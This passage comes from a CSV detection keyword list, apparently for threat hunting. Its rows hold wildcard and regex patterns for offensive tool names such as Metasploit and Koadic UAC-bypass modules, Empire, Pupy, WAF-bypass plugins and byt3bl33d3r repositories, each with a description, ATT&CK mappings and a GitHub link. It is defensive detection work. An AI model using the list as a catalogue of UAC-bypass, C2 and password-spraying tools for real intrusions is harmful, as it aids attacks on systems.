concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*bypassUAC*.py*",".{0,1000}bypassUAC.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*--bypass-uac*--logontype*",".{0,1000}\-\-bypass\-uac.{0,1000}\-\-logontype.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*bypassuac_comhijack.rb*",".{0,1000}bypassuac_comhijack\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_compdefaults*",".{0,1000}bypassuac_compdefaults.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_compmgmtlauncher*",".{0,1000}bypassuac_compmgmtlauncher.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_eventvwr*",".{0,1000}bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_fodhelper*",".{0,1000}bypassuac_fodhelper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_injection*",".{0,1000}bypassuac_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection.*",".{0,1000}bypassuac_injection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection.rb*",".{0,1000}bypassuac_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection_winsxs.rb*",".{0,1000}bypassuac_injection_winsxs\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_registry.*",".{0,1000}bypassuac_registry\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*bypassuac_sdclt*",".{0,1000}bypassuac_sdclt.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_silentcleanup.rb*",".{0,1000}bypassuac_silentcleanup\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_slui*",".{0,1000}bypassuac_slui.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_sluihijack.*",".{0,1000}bypassuac_sluihijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_systempropertiesadvanced*",".{0,1000}bypassuac_systempropertiesadvanced.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_token_imp.*",".{0,1000}bypassuac_token_imp\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*bypassuac_vbs.*",".{0,1000}bypassuac_vbs\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_windows_store_reg.rb*",".{0,1000}bypassuac_windows_store_reg\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_wsreset*",".{0,1000}bypassuac_wsreset.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*BypassUACTokenManipulation*",".{0,1000}BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bypassuac-x64.dll*",".{0,1000}bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x64.exe*",".{0,1000}bypassuac\-x64\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x86.dll*",".{0,1000}bypassuac\-x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x86.exe*",".{0,1000}bypassuac\-x86\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*bypasswaf.py*",".{0,1000}bypasswaf\.py.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*byt3bl33d3r*",".{0,1000}byt3bl33d3r.{0,1000}","offensive_tool_keyword","Github Username","malware and offensive tools developper ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*byt3bl33d3r/BOF-Nim*",".{0,1000}byt3bl33d3r\/BOF\-Nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*byt3bl33d3r/DeathStar*",".{0,1000}byt3bl33d3r\/DeathStar.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*byt3bl33d3r/dnschef-ng*",".{0,1000}byt3bl33d3r\/dnschef\-ng.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*byt3bl33d3r/gcat*",".{0,1000}byt3bl33d3r\/gcat.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*byt3bl33d3r/ItWasAllADream*",".{0,1000}byt3bl33d3r\/ItWasAllADream.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*byt3bl33d3r/NimDllSideload*",".{0,1000}byt3bl33d3r\/NimDllSideload.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*byt3bl33d3r/SpamChannel*",".{0,1000}byt3bl33d3r\/SpamChannel.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*byt3bl33d3r/SprayingToolkit*",".{0,1000}byt3bl33d3r\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" 